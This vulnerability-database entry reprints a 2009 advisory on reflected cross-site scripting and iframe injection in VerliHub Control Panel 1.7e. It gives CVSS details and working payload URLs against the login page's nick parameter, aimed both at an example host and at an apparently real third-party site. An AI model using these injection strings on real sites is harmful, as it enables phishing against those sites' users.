VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability

2009-07-22 / 2009-07-23

Credit: teamelite

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2009-2569

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability

http://vhcp.verlihub-project.org

-6-05-2009

-Methodman - http://nemesis.te-home.net

-Example:-

Cross-site scripting vulnerability on login page

http://vhcp.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>

http://vhcp.com/index.php?page=login&nick="><iframe src=
http://nemesis.te-home.net/index.html?news></iframe>

-Proof of Concept:-

http://wiretransfers.net/index.php?page=login&nick="><script>alert("Vulnerable");</script>

http://wiretransfers.net/index.php?page=login&nick="><iframe src=
http://nemesis.te-home.net/index.html?news></iframe>

-Nice screen:-

http://img7.imageshack.us/img7/4660/vhcp.jpg

Vulnerability that can be used to perform phishing attacks

[so verlibug sucks++++ =))]

/teamelite 2009

References:

http://www.vupen.com/english/advisories/2009/1264

http://www.securityfocus.com/bid/34856

http://secunia.com/advisories/34941

http://packetstorm.linuxsecurity.com/0905-exploits/verlihub-xss.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.